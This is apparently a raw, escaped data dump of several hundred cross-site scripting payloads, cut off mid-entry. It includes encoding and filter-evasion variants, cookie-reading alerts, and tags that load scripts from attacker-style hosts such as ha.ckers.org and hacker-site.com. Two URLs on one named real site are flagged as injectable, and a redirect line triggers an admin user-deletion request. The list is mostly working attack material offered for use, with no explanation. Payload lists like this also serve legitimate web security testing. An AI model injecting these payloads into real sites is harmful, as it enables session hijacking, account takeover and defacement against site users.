/*iframe/src*/\u003e\n//|\\\\ \u003cscript //|\\\\ src='https://dl.dropbox.com/u/13018058/js.js'\u003e //|\\\\ \u003c/script //|\\\\\n\u003c/font\u003e/\u003csvg\u003e\u003cstyle\u003e{src\u0026#x3A;'\u003cstyle/onload=this.onload=confirm(1)\u003e'\u003c/font\u003e/\u003c/style\u003e\n\u003ca/href=\"javascript:\u0026#13; javascript:prompt(1)\"\u003e\u003cinput type=\"X\"\u003e\n\u003c/plaintext\\\u003e\u003c/|\\\u003e\u003cplaintext/onmouseover=prompt(1)\n\u003c/svg\u003e''\u003csvg\u003e\u003cscript 'AQuickBrownFoxJumpsOverTheLazyDog'\u003ealert\u0026#x28;1\u0026#x29; {Opera}\n\u003ca href=\"javascript\u0026colon;\\u0061\u0026#x6C;\u0026#101%72t\u0026lpar;1\u0026rpar;\"\u003e\u003cbutton\u003e\n\u003cdiv onmouseover='alert\u0026lpar;1\u0026rpar;'\u003eDIV\u003c/div\u003e\n\u003ciframe style=\"position:absolute;top:0;left:0;width:100%;height:100%\" onmouseover=\"prompt(1)\"\u003e\n\u003ca href=\"jAvAsCrIpT\u0026colon;alert\u0026lpar;1\u0026rpar;\"\u003eX\u003c/a\u003e\n\u003cembed src=\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\"\u003e\n\u003cobject data=\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\"\u003e\n\u003cvar onmouseover=\"prompt(1)\"\u003eOn Mouse Over\u003c/var\u003e\n\u003ca href=javascript\u0026colon;alert\u0026lpar;document\u0026period;cookie\u0026rpar;\u003eClick Here\u003c/a\u003e\n\u003cimg src=\"/\" =_=\" title=\"onerror='prompt(1)'\"\u003e\n\u003c%\u003c!--'%\u003e\u003cscript\u003ealert(1);\u003c/script --\u003e\n\u003cscript src=\"data:text/javascript,alert(1)\"\u003e\u003c/script\u003e\n\u003ciframe/src \\/\\/onload = prompt(1)\n\u003ciframe/onreadystatechange=alert(1)\n\u003csvg/onload=alert(1)\n\u003cinput value=\u003c\u003e\u003ciframe/src=javascript:confirm(1)\n\u003cinput type=\"text\" value=`` \u003cdiv/onmouseover='alert(1)'\u003eX\u003c/div\u003e\n\u003ciframe src=j\u0026Tab;a\u0026Tab;v\u0026Tab;a\u0026Tab;s\u0026Tab;c\u0026Tab;r\u0026Tab;i\u0026Tab;p\u0026Tab;t\u0026Tab;:a\u0026Tab;l\u0026Tab;e\u0026Tab;r\u0026Tab;t\u0026Tab;%28\u0026Tab;1\u0026Tab;%29\u003e\u003c/iframe\u003e\n\u003cimg src=`xx:xx`onerror=alert(1)\u003e\n\u003cobject type=\"text/x-scriptlet\" data=\"http://jsfiddle.net/XLE63/ \"\u003e\u003c/object\u003e\n\u003cmeta http-equiv=\"refresh\" content=\"0;javascript\u0026colon;alert(1)\"/\u003e\n\u003cembed code=\"http://businessinfo.co.uk/labs/xss/xss.swf\" allowscriptaccess=always\u003e\n\u003csvg contentScriptType=text/vbs\u003e\u003cscript\u003eMsgBox+1\n\u003ca href=\"data:text/html;base64_,\u003csvg/onload=\\u0061\u0026#x6C;\u0026#101%72t(1)\u003e\"\u003eX\u003c/a\n\u003ciframe/onreadystatechange=\\u0061\\u006C\\u0065\\u0072\\u0074('\\u0061') worksinIE\u003e\n\u003cscript\u003e~'\\u0061' ; \\u0074\\u0068\\u0072\\u006F\\u0077 ~ \\u0074\\u0068\\u0069\\u0073. \\u0061\\u006C\\u0065\\u0072\\u0074(~'\\u0061')\u003c/script U+\n\u003cscript/src=\"data\u0026colon;text%2Fj\\u0061v\\u0061script,\\u0061lert('\\u0061')\"\u003e\u003c/script a=\\u0061 \u0026 /=%2F\n\u003cscript/src=data\u0026colon;text/j\\u0061v\\u0061\u0026#115\u0026#99\u0026#114\u0026#105\u0026#112\u0026#116,\\u0061%6C%65%72%74(/XSS/)\u003e\u003c/script\n\u003cobject data=javascript\u0026colon;\\u0061\u0026#x6C;\u0026#101%72t(1)\u003e\n\u003cscript\u003e+-+-1-+-+alert(1)\u003c/script\u003e\n\u003cbody/onload=\u0026lt;!--\u0026gt;\u0026#10alert(1)\u003e\n\u003cscript itworksinallbrowsers\u003e/*\u003cscript* */alert(1)\u003c/script\n\u003cimg src ?itworksonchrome?\\/onerror = alert(1)\n\u003csvg\u003e\u003cscript\u003e//\u0026NewLine;confirm(1);\u003c/script \u003c/svg\u003e\n\u003csvg\u003e\u003cscript onlypossibleinopera:-)\u003e alert(1)\n\u003ca aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j\u0026#97v\u0026#97script\u0026#x3A;\u0026#97lert(1)\u003eClickMe\n\u003cscript x\u003e alert(1) \u003c/script 1=2\n\u003cdiv/onmouseover='alert(1)'\u003e style=\"x:\"\u003e\n\u003c--`\u003cimg/src=` onerror=alert(1)\u003e --!\u003e\n\u003cscript/src=\u0026#100\u0026#97\u0026#116\u0026#97:text/\u0026#x6a\u0026#x61\u0026#x76\u0026#x61\u0026#x73\u0026#x63\u0026#x72\u0026#x69\u0026#x000070\u0026#x074,\u0026#x0061;\u0026#x06c;\u0026#x0065;\u0026#x00000072;\u0026#x00074;(1)\u003e\u003c/script\u003e\n\u003cdiv style=\"position:absolute;top:0;left:0;width:100%;height:100%\" onmouseover=\"prompt(1)\" onclick=\"alert(1)\"\u003ex\u003c/button\u003e\n\"\u003e\u003cimg src=x onerror=window.open('https://www.google.com/');\u003e\n\u003cform\u003e\u003cbutton formaction=javascript\u0026colon;alert(1)\u003eCLICKME\n\u003cmath\u003e\u003ca xlink:href=\"//jsfiddle.net/t846h/\"\u003eclick\n\u003cobject data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+\u003e\u003c/object\u003e\n\u003ciframe src=\"data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E\"\u003e\u003c/iframe\u003e\n\u003ca href=\"data:text/html;blabla,\u0026#60\u0026#115\u0026#99\u0026#114\u0026#105\u0026#112\u0026#116\u0026#32\u0026#115\u0026#114\u0026#99\u0026#61\u0026#34\u0026#104\u0026#116\u0026#116\u0026#112\u0026#58\u0026#47\u0026#47\u0026#115\u0026#116\u0026#101\u0026#114\u0026#110\u0026#101\u0026#102\u0026#97\u0026#109\u0026#105\u0026#108\u0026#121\u0026#46\u0026#110\u0026#101\u0026#116\u0026#47\u0026#102\u0026#111\u0026#111\u0026#46\u0026#106\u0026#115\u0026#34\u0026#62\u0026#60\u0026#47\u0026#115\u0026#99\u0026#114\u0026#105\u0026#112\u0026#116\u0026#62\u0026#8203\"\u003eClick Me\u003c/a\u003e\n'\u003e//\\\\,\u003c'\u003e\"\u003e\"\u003e\"*\"\n'); alert('XSS\n\u003cscript\u003ealert(1);\u003c/script\u003e\n\u003cscript\u003ealert('XSS');\u003c/script\u003e\n\u003cscr\u003cscript\u003eipt\u003ealert('XSS');\u003c/scr\u003c/script\u003eipt\u003e\n\u003cscript\u003ealert(String.fromCharCode(88,83,83))\u003c/script\u003e\n\u003cimg src=foo.png onerror=alert(/xssed/) /\u003e\n\u003cstyle\u003e@im\\port'\\ja\\vasc\\ript:alert(\\\"XSS\\\")';\u003c/style\u003e\n\u003c? echo('\u003cscr)'; echo('ipt\u003ealert(\\\"XSS\\\")\u003c/script\u003e'); ?\u003e\n\u003cmarquee\u003e\u003cscript\u003ealert('XSS')\u003c/script\u003e\u003c/marquee\u003e\n\u003cIMG SRC=\\\"jav\u0026#x09;ascript:alert('XSS');\\\"\u003e\n\u003cIMG SRC=\\\"jav\u0026#x0A;ascript:alert('XSS');\\\"\u003e\n\u003cIMG SRC=\\\"jav\u0026#x0D;ascript:alert('XSS');\\\"\u003e\n\"\u003e\u003cscript\u003ealert(0)\u003c/script\u003e\n\u003cscript src=http://yoursite.com/your_files.js\u003e\u003c/script\u003e\n\u003c/title\u003e\u003cscript\u003ealert(/xss/)\u003c/script\u003e\n\u003c/textarea\u003e\u003cscript\u003ealert(/xss/)\u003c/script\u003e\n\u003cIMG LOWSRC=\\\"javascript:alert('XSS')\\\"\u003e\n\u003cIMG DYNSRC=\\\"javascript:alert('XSS')\\\"\u003e\n\u003cfont style='color:expression(alert(document.cookie))'\u003e\n\u003cimg src=\"javascript:alert('XSS')\"\u003e\n\u003cscript language=\"JavaScript\"\u003ealert('XSS')\u003c/script\u003e\n\u003cbody onunload=\"javascript:alert('XSS');\"\u003e\n\u003cbody onLoad=\"alert('XSS');\"\n[color=red' onmouseover=\"alert('xss')\"]mouse over[/color]\n\"/\u003e\u003c/a\u003e\u003c/\u003e\u003cimg src=1.gif onerror=alert(1)\u003e\nwindow.alert(\"Bonjour !\");\n\u003cdiv style=\"x:expression((window.r==1)?'':eval('r=1;\nalert(String.fromCharCode(88,83,83));'))\"\u003e\n\u003ciframe\u003c?php echo chr(11)?\u003e onload=alert('XSS')\u003e\u003c/iframe\u003e\n\"\u003e\u003cscript alert(String.fromCharCode(88,83,83))\u003c/script\u003e\n'\u003e\u003e\u003cmarquee\u003e\u003ch1\u003eXSS\u003c/h1\u003e\u003c/marquee\u003e\n'\"\u003e\u003e\u003cscript\u003ealert('XSS')\u003c/script\u003e\n'\"\u003e\u003e\u003cmarquee\u003e\u003ch1\u003eXSS\u003c/h1\u003e\u003c/marquee\u003e\n\u003cMETA HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0;url=javascript:alert('XSS');\\\"\u003e\n\u003cMETA HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0; URL=http://;URL=javascript:alert('XSS');\\\"\u003e\n\u003cscript\u003evar var = 1; alert(var)\u003c/script\u003e\n\u003cSTYLE type=\"text/css\"\u003eBODY{background:url(\"javascript:alert('XSS')\")}\u003c/STYLE\u003e\n\u003c?='\u003cSCRIPT\u003ealert(\"XSS\")\u003c/SCRIPT\u003e'?\u003e\n\u003cIMG SRC='vbscript:msgbox(\\\"XSS\\\")'\u003e\n\" onfocus=alert(document.domain) \"\u003e \u003c\"\n\u003cFRAMESET\u003e\u003cFRAME SRC=\\\"javascript:alert('XSS');\\\"\u003e\u003c/FRAMESET\u003e\n\u003cSTYLE\u003eli {list-style-image: url(\\\"javascript:alert('XSS')\\\");}\u003c/STYLE\u003e\u003cUL\u003e\u003cLI\u003eXSS\nperl -e 'print \\\"\u003cSCR\\0IPT\u003ealert(\\\"XSS\\\")\u003c/SCR\\0IPT\u003e\\\";' \u003e out\nperl -e 'print \\\"\u003cIMG SRC=java\\0script:alert(\\\"XSS\\\")\u003e\\\";' \u003e out\n\u003cbr size=\\\"\u0026{alert('XSS')}\\\"\u003e\n\u003cscrscriptipt\u003ealert(1)\u003c/scrscriptipt\u003e\n\u003c/br style=a:expression(alert())\u003e\n\u003c/script\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\n\"\u003e\u003cBODY onload!#$%\u0026()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")\u003e\n[color=red width=expression(alert(123))][color]\n\u003cBASE HREF=\"javascript:alert('XSS');//\"\u003e\nExecute(MsgBox(chr(88)\u0026chr(83)\u0026chr(83)))\u003c\n\"\u003e\u003c/iframe\u003e\u003cscript\u003ealert(123)\u003c/script\u003e\n\u003cbody onLoad=\"while(true) alert('XSS');\"\u003e\n'\"\u003e\u003c/title\u003e\u003cscript\u003ealert(1111)\u003c/script\u003e\n\u003c/textarea\u003e'\"\u003e\u003cscript\u003ealert(document.cookie)\u003c/script\u003e\n'\"\"\u003e\u003cscript language=\"JavaScript\"\u003e alert('X \\nS \\nS');\u003c/script\u003e\n\u003c/script\u003e\u003c/script\u003e\u003c\u003c\u003c\u003cscript\u003e\u003c\u003e\u003e\u003e\u003e\u003c\u003c\u003cscript\u003ealert(123)\u003c/script\u003e\n\u003chtml\u003e\u003cnoalert\u003e\u003cnoscript\u003e(123)\u003c/noscript\u003e\u003cscript\u003e(123)\u003c/script\u003e\n'\u003e\u003c/select\u003e\u003cscript\u003ealert(123)\u003c/script\u003e\n'\u003e\"\u003e\u003cscript src = 'http://www.site.com/XSS.js'\u003e\u003c/script\u003e\n}\u003c/style\u003e\u003cscript\u003ea=eval;b=alert;a(b(/XSS/.source));\u003c/script\u003e\n\u003cSCRIPT\u003edocument.write(\"XSS\");\u003c/SCRIPT\u003e\na=\"get\";b=\"URL\";c=\"javascript:\";d=\"alert('xss');\";eval(a+b+c+d);\n='\u003e\u003cscript\u003ealert(\"xss\")\u003c/script\u003e\n\u003cscript+src=\"\u003e\"+src=\"http://yoursite.com/xss.js?69,69\"\u003e\u003c/script\u003e\n\u003cbody background=javascript:'\"\u003e\u003cscript\u003ealert(navigator.userAgent)\u003c/script\u003e\u003e\u003c/body\u003e\n\"\u003e/XaDoS/\u003e\u003cscript\u003ealert(document.cookie)\u003c/script\u003e\u003cscript src=\"http://www.site.com/XSS.js\"\u003e\u003c/script\u003e\n\"\u003e/KinG-InFeT.NeT/\u003e\u003cscript\u003ealert(document.cookie)\u003c/script\u003e\nsrc=\"http://www.site.com/XSS.js\"\u003e\u003c/script\u003e\ndata:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=\n!--\" /\u003e\u003cscript\u003ealert('xss');\u003c/script\u003e\n\u003cscript\u003ealert(\"XSS by \\nxss\")\u003c/script\u003e\u003cmarquee\u003e\u003ch1\u003eXSS by xss\u003c/h1\u003e\u003c/marquee\u003e\n\"\u003e\u003cscript\u003ealert(\"XSS by \\nxss\")\u003c/script\u003e\u003e\u003cmarquee\u003e\u003ch1\u003eXSS by xss\u003c/h1\u003e\u003c/marquee\u003e\n'\"\u003e\u003c/title\u003e\u003cscript\u003ealert(\"XSS by \\nxss\")\u003c/script\u003e\u003e\u003cmarquee\u003e\u003ch1\u003eXSS by xss\u003c/h1\u003e\u003c/marquee\u003e\n\u003cimg \"\"\"\u003e\u003cscript\u003ealert(\"XSS by \\nxss\")\u003c/script\u003e\u003cmarquee\u003e\u003ch1\u003eXSS by xss\u003c/h1\u003e\u003c/marquee\u003e\n\u003cscript\u003ealert(1337)\u003c/script\u003e\u003cmarquee\u003e\u003ch1\u003eXSS by xss\u003c/h1\u003e\u003c/marquee\u003e\n\"\u003e\u003cscript\u003ealert(1337)\u003c/script\u003e\"\u003e\u003cscript\u003ealert(\"XSS by \\nxss\u003c/h1\u003e\u003c/marquee\u003e\n'\"\u003e\u003c/title\u003e\u003cscript\u003ealert(1337)\u003c/script\u003e\u003e\u003cmarquee\u003e\u003ch1\u003eXSS by xss\u003c/h1\u003e\u003c/marquee\u003e\n\u003ciframe src=\"javascript:alert('XSS by \\nxss');\"\u003e\u003c/iframe\u003e\u003cmarquee\u003e\u003ch1\u003eXSS by xss\u003c/h1\u003e\u003c/marquee\u003e\n'\u003e\u003cSCRIPT\u003ealert(String.fromCharCode(88,83,83))\u003c/SCRIPT\u003e\u003cimg src=\"\" alt='\n\"\u003e\u003cSCRIPT\u003ealert(String.fromCharCode(88,83,83))\u003c/SCRIPT\u003e\u003cimg src=\"\" alt=\"\n\\'\u003e\u003cSCRIPT\u003ealert(String.fromCharCode(88,83,83))\u003c/SCRIPT\u003e\u003cimg src=\"\" alt=\\'\nhttp://www.simpatie.ro/index.php?page=friends\u0026member=781339\u0026javafunctionname=Pageclick\u0026javapgno=2 javapgno=2 ??XSS??\nhttp://www.simpatie.ro/index.php?page=top_movies\u0026cat=13\u0026p=2 p=2 ??XSS??\n'); alert('xss'); var x='\n\\\\'); alert(\\'xss\\');var x=\\'\n//--\u003e\u003c/SCRIPT\u003e\u003cSCRIPT\u003ealert(String.fromCharCode(88,83,83));\n\u003e\"\u003e\u003cScRiPt%20%0a%0d\u003ealert(561177485777)%3B\u003c/ScRiPt\u003e\n\u003cimg src=\"Mario Heiderich says that svg SHOULD not be executed trough image tags\" onerror=\"javascript:document.write('\\u003c\\u0069\\u0066\\u0072\\u0061\\u006d\\u0065\\u0020\\u0073\\u0072\\u0063\\u003d\\u0022\\u0064\\u0061\\u0074\\u0061\\u003a\\u0069\\u006d\\u0061\\u0067\\u0065\\u002f\\u0073\\u0076\\u0067\\u002b\\u0078\\u006d\\u006c\\u003b\\u0062\\u0061\\u0073\\u0065\\u0036\\u0034\\u002c\\u0050\\u0048\\u004e\\u0032\\u005a\\u0079\\u0042\\u0034\\u0062\\u0057\\u0078\\u0075\\u0063\\u007a\\u0030\\u0069\\u0061\\u0048\\u0052\\u0030\\u0063\\u0044\\u006f\\u0076\\u004c\\u0033\\u0064\\u0033\\u0064\\u0079\\u0035\\u0033\\u004d\\u0079\\u0035\\u0076\\u0063\\u006d\\u0063\\u0076\\u004d\\u006a\\u0041\\u0077\\u004d\\u0043\\u0039\\u007a\\u0064\\u006d\\u0063\\u0069\\u0050\\u0069\\u0041\\u0067\\u0043\\u0069\\u0041\\u0067\\u0049\\u0044\\u0078\\u0070\\u0062\\u0057\\u0046\\u006e\\u005a\\u0053\\u0042\\u0076\\u0062\\u006d\\u0078\\u0076\\u0059\\u0057\\u0051\\u0039\\u0049\\u006d\\u0046\\u0073\\u005a\\u0058\\u004a\\u0030\\u004b\\u0044\\u0045\\u0070\\u0049\\u006a\\u0034\\u0038\\u004c\\u0032\\u006c\\u0074\\u0059\\u0057\\u0064\\u006c\\u0050\\u0069\\u0041\\u0067\\u0043\\u0069\\u0041\\u0067\\u0049\\u0044\\u0078\\u007a\\u0064\\u006d\\u0063\\u0067\\u0062\\u0032\\u0035\\u0073\\u0062\\u0032\\u0046\\u006b\\u0050\\u0053\\u004a\\u0068\\u0062\\u0047\\u0056\\u0079\\u0064\\u0043\\u0067\\u0079\\u004b\\u0053\\u0049\\u002b\\u0050\\u0043\\u0039\\u007a\\u0064\\u006d\\u0063\\u002b\\u0049\\u0043\\u0041\\u004b\\u0049\\u0043\\u0041\\u0067\\u0050\\u0048\\u004e\\u006a\\u0063\\u006d\\u006c\\u0077\\u0064\\u0044\\u0035\\u0068\\u0062\\u0047\\u0056\\u0079\\u0064\\u0043\\u0067\\u007a\\u004b\\u0054\\u0077\\u0076\\u0063\\u0032\\u004e\\u0079\\u0061\\u0058\\u0042\\u0030\\u0050\\u0069\\u0041\\u0067\\u0043\\u0069\\u0041\\u0067\\u0049\\u0044\\u0078\\u006b\\u005a\\u0057\\u005a\\u007a\\u0049\\u0047\\u0039\\u0075\\u0062\\u0047\\u0039\\u0068\\u005a\\u0044\\u0030\\u0069\\u0059\\u0057\\u0078\\u006c\\u0063\\u006e\\u0051\\u006f\\u004e\\u0043\\u006b\\u0069\\u0050\\u006a\\u0077\\u0076\\u005a\\u0047\\u0056\\u006d\\u0063\\u007a\\u0034\\u0067\\u0049\\u0041\\u006f\\u0067\\u0049\\u0043\\u0041\\u0038\\u005a\\u0079\\u0042\\u0076\\u0062\\u006d\\u0078\\u0076\\u0059\\u0057\\u0051\\u0039\\u0049\\u006d\\u0046\\u0073\\u005a\\u0058\\u004a\\u0030\\u004b\\u0044\\u0055\\u0070\\u0049\\u006a\\u0034\\u0067\\u0049\\u0041\\u006f\\u0067\\u0049\\u0043\\u0041\\u0067\\u0049\\u0043\\u0041\\u0067\\u0050\\u0047\\u004e\\u0070\\u0063\\u006d\\u004e\\u0073\\u005a\\u0053\\u0042\\u0076\\u0062\\u006d\\u0078\\u0076\\u0059\\u0057\\u0051\\u0039\\u0049\\u006d\\u0046\\u0073\\u005a\\u0058\\u004a\\u0030\\u004b\\u0044\\u0059\\u0070\\u0049\\u0069\\u0041\\u0076\\u0050\\u0069\\u0041\\u0067\\u0043\\u0069\\u0041\\u0067\\u0049\\u0043\\u0041\\u0067\\u0049\\u0043\\u0041\\u0038\\u0064\\u0047\\u0056\\u0034\\u0064\\u0043\\u0042\\u0076\\u0062\\u006d\\u0078\\u0076\\u0059\\u0057\\u0051\\u0039\\u0049\\u006d\\u0046\\u0073\\u005a\\u0058\\u004a\\u0030\\u004b\\u0044\\u0063\\u0070\\u0049\\u006a\\u0034\\u0038\\u004c\\u0033\\u0052\\u006c\\u0065\\u0048\\u0051\\u002b\\u0049\\u0043\\u0041\\u004b\\u0049\\u0043\\u0041\\u0067\\u0050\\u0043\\u0039\\u006e\\u0050\\u0069\\u0041\\u0067\\u0043\\u006a\\u0077\\u0076\\u0063\\u0033\\u005a\\u006e\\u0050\\u0069\\u0041\\u0067\\u0022\\u003e\\u003c\\u002f\\u0069\\u0066\\u0072\\u0061\\u006d\\u0065\\u003e');\"\u003e\u003c/img\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n\u003cSCRIPT SRC=http://hacker-site.com/xss.js\u003e\u003c/SCRIPT\u003e\n\u003cSCRIPT\u003e alert(“XSS”); \u003c/SCRIPT\u003e\n\u003cBODY ONLOAD=alert(\"XSS\")\u003e\n\u003cIMG DYNSRC=\"javascript:alert('XSS')\"\u003e\n\u003cIMG LOWSRC=\"javascript:alert('XSS')\"\u003e\n\u003cIFRAME SRC=”http://hacker-site.com/xss.html”\u003e\n\u003cLINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\"\u003e\n\u003cTABLE BACKGROUND=\"javascript:alert('XSS')\"\u003e\n\u003cTD BACKGROUND=\"javascript:alert('XSS')\"\u003e\n\u003cDIV STYLE=\"background-image: url(javascript:alert('XSS'))\"\u003e\n\u003cDIV STYLE=\"width: expression(alert('XSS'));\"\u003e\n\u003cOBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://hacker.com/xss.html\"\u003e\n\u003cEMBED SRC=\"http://hacker.com/xss.swf\" AllowScriptAccess=\"always\"\u003e\n\u0026apos;;alert(String.fromCharCode(88,83,83))//\\\u0026apos;;alert(String.fromCharCode(88,83,83))//\u0026quot;;alert(String.fromCharCode(88,83,83))//\\\u0026quot;;alert(String.fromCharCode(88,83,83))//--\u0026gt;\u0026lt;/SCRIPT\u0026gt;\u0026quot;\u0026gt;\u0026apos;\u0026gt;\u0026lt;SCRIPT\u0026gt;alert(String.fromCharCode(88,83,83))\u0026lt;/SCRIPT\u0026gt;\n\u0026apos;\u0026apos;;!--\u0026quot;\u0026lt;XSS\u0026gt;=\u0026amp;{()}\n\u0026lt;SCRIPT\u0026gt;alert(\u0026apos;XSS\u0026apos;)\u0026lt;/SCRIPT\u0026gt;\n\u0026lt;SCRIPT SRC=http://ha.ckers.org/xss.js\u0026gt;\u0026lt;/SCRIPT\u0026gt;\n\u0026lt;SCRIPT\u0026gt;alert(String.fromCharCode(88,83,83))\u0026lt;/SCRIPT\u0026gt;\n\u0026lt;BASE HREF=\u0026quot;javascript:alert(\u0026apos;XSS\u0026apos;);//\u0026quot;\u0026gt;\n\u0026lt;BGSOUND SRC=\u0026quot;javascript:alert(\u0026apos;XSS\u0026apos;);\u0026quot;\u0026gt;\n\u0026lt;BODY BACKGROUND=\u0026quot;javascript:alert(\u0026apos;XSS\u0026apos;);\u0026quot;\u0026gt;\n\u0026lt;BODY ONLOAD=alert(\u0026apos;XSS\u0026apos;)\u0026gt;\n\u0026lt;DIV STYLE=\u0026quot;background-image: url(javascript:alert(\u0026apos;XSS\u0026apos;))\u0026quot;\u0026gt;\n\u0026lt;DIV STYLE=\u0026quot;background-image: url(\u0026amp;#1;javascript:alert(\u0026apos;XSS\u0026apos;))\u0026quot;\u0026gt;\n\u0026lt;DIV STYLE=\u0026quot;width: expression(alert(\u0026apos;XSS\u0026apos;));\u0026quot;\u0026gt;\n\u0026lt;FRAMESET\u0026gt;\u0026lt;FRAME SRC=\u0026quot;javascript:alert(\u0026apos;XSS\u0026apos;);\u0026quot;\u0026gt;\u0026lt;/FRAMESET\u0026gt;\n\u0026lt;IFRAME SRC=\u0026quot;javascript:alert(\u0026apos;XSS\u0026apos;);\u0026quot;\u0026gt;\u0026lt;/IFRAME\u0026gt;\n\u0026lt;INPUT TYPE=\u0026quot;IMAGE\u0026quot; SRC=\u0026quot;javascript:alert(\u0026apos;XSS\u0026apos;);\u0026quot;\u0026gt;\n\u0026lt;IMG SRC=\u0026quot;javascript:alert(\u0026apos;XSS\u0026apos;);\u0026quot;\u0026gt;\n\u0026lt;IMG SRC=javascript:alert(\u0026apos;XSS\u0026apos;)\u0026gt;\n\u0026lt;IMG DYNSRC=\u0026quot;javascript:alert(\u0026apos;XSS\u0026apos;);\u0026quot;\u0026gt;\n\u0026lt;IMG LOWSRC=\u0026quot;javascript:alert(\u0026apos;XSS\u0026apos;);\u0026quot;\u0026gt;\n\u0026lt;IMG SRC=\u0026quot;http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\u0026quot;\u0026gt;\nRedirect 302 /a.jpg http://victimsite.com/admin.asp\u0026amp;deleteuser\nexp/*\u0026lt;XSS STYLE=\u0026apos;no\\xss:noxss(\u0026quot;*//*\u0026quot;);\n\u0026lt;STYLE\u0026gt;li {list-style-image: url(\u0026quot;javascript:alert(\u0026#39;XSS\u0026#39;)\u0026quot;);}\u0026lt;/STYLE\u0026gt;\u0026lt;UL\u0026gt;\u0026lt;LI\u0026gt;XSS\n\u0026lt;IMG SRC=\u0026apos;vbscript:msgbox(\u0026quot;XSS\u0026quot;)\u0026apos;\u0026gt;\n\u0026lt;LAYER SRC=\u0026quot;http://ha.ckers.org/scriptlet.html\u0026quot;\u0026gt;\u0026lt;/LAYER\u0026gt;\n\u0026lt;IMG SRC=\u0026quot;livescript:[code]\u0026quot;\u0026gt;\n\u0026lt;META HTTP-EQUIV=\u0026quot;refresh\u0026quot; CONTENT=\u0026quot;0;url=javascript:alert(\u0026apos;XSS\u0026apos;);\u0026quot;\u0026gt;\n\u0026lt;META HTTP-EQUIV=\u0026quot;refresh\u0026quot; CONTENT=\u0026quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\u0026quot;\u0026gt;\n\u0026lt;META HTTP-EQUIV=\u0026quot;refresh\u0026quot; CONTENT=\u0026quot;0; URL=http://;URL=javascript:alert(\u0026apos;XSS\u0026apos;);\u0026quot;\u0026gt;\n\u0026lt;IMG SRC=\u0026quot;mocha:[code]\u0026quot;\u0026gt;\n\u0026lt;OBJECT TYPE=\u0026quot;text/x-scriptlet\u0026quot; DATA=\u0026quot;http://ha.ckers.org/scriptlet.html\u0026quot;\u0026gt;\u0026lt;/OBJECT\u0026gt;\n\u0026lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389\u0026gt;\u0026lt;param name=url value=javascript:alert(\u0026apos;XSS\u0026apos;)\u0026gt;\u0026lt;/OBJECT\u0026gt;\n\u0026lt;EMBED SRC=\u0026quot;http://ha.ckers.org/xss.swf\u0026quot; AllowScriptAccess=\u0026quot;always\u0026quot;\u0026gt;\u0026lt;/EMBED\u0026gt;\na=\u0026quot;get\u0026quot;;\u0026amp;#10;b=\u0026quot;URL(\u0026quot;\u0026quot;;\u0026amp;#10;c=\u0026quot;javascript:\u0026quot;;\u0026amp;#10;d=\u0026quot;alert(\u0026apos;XSS\u0026apos;);\u0026quot;)\u0026quot;;\u0026#10;eval(a+b+c+d);\n\u0026lt;STYLE TYPE=\u0026quot;text/javascript\u0026quot;\u0026gt;alert(\u0026apos;XSS\u0026apos;);\u0026lt;/STYLE\u0026gt;\n\u0026lt;IMG STYLE=\u0026quot;xss:expr/*XSS*/ession(alert(\u0026apos;XSS\u0026apos;))\u0026quot;\u0026gt;\n\u0026lt;XSS STYLE=\u0026quot;xss:expression(alert(\u0026apos;XSS\u0026apos;))\u0026quot;\u0026gt;\n\u0026lt;STYLE\u0026gt;.XSS{background-image:url(\u0026quot;javascript:alert(\u0026apos;XSS\u0026apos;)\u0026quot;);}\u0026lt;/STYLE\u0026gt;\u0026lt;A CLASS=XSS\u0026gt;\u0026lt;/A\u0026gt;\n\u0026lt;STYLE type=\u0026quot;text/css\u0026quot;\u0026gt;BODY{background:url(\u0026quot;javascript:alert(\u0026apos;XSS\u0026apos;)\u0026quot;)}\u0026lt;/STYLE\u0026gt;\n\u0026lt;LINK REL=\u0026quot;stylesheet\u0026quot; HREF=\u0026quot;javascript:alert(\u0026apos;XSS\u0026apos;);\u0026quot;\u0026gt;\n\u0026lt;LINK REL=\u0026quot;stylesheet\u0026quot; HREF=\u0026quot;http://ha.ckers.org/xss.css\u0026quot;\u0026gt;\n\u0026lt;STYLE\u0026gt;@import\u0026apos;http://ha.ckers.org/xss.css\u0026apos;;\u0026lt;/STYLE\u0026gt;\n\u0026lt;META HTTP-EQUIV=\u0026quot;Link\u0026quot; Content=\u0026quot;\u0026lt;http://ha.ckers.org/xss.css\u0026gt;; REL=stylesheet\u0026quot;\u0026gt;\n\u0026lt;STYLE\u0026gt;BODY{-moz-binding:url(\u0026quot;http://ha.ckers.org/xssmoz.xml#xss\u0026quot;)}\u0026lt;/STYLE\u0026gt;\n\u0026lt;TABLE BACKGROUND=\u0026quot;javascript:alert(\u0026apos;XSS\u0026apos;)\u0026quot;\u0026gt;\u0026lt;/TABLE\u0026gt;\n\u0026lt;TABLE\u0026gt;\u0026lt;TD BACKGROUND=\u0026quot;javascript:alert(\u0026apos;XSS\u0026apos;)\u0026quot;\u0026gt;\u0026lt;/TD\u0026gt;\u0026lt;/TABLE\u0026gt;\n\u0026lt;HTML xmlns:xss\u0026gt;\n\u0026lt;XML ID=I\u0026gt;\u0026lt;X\u0026gt;\u0026lt;C\u0026gt;\u0026lt;![CDATA[\u0026lt;IMG SRC=\u0026quot;javas]]\u0026gt;\u0026lt;![CDATA[cript:alert(\u0026apos;XSS\u0026apos;);\u0026quot;\u0026gt;]]\u0026gt;\n\u0026lt;XML 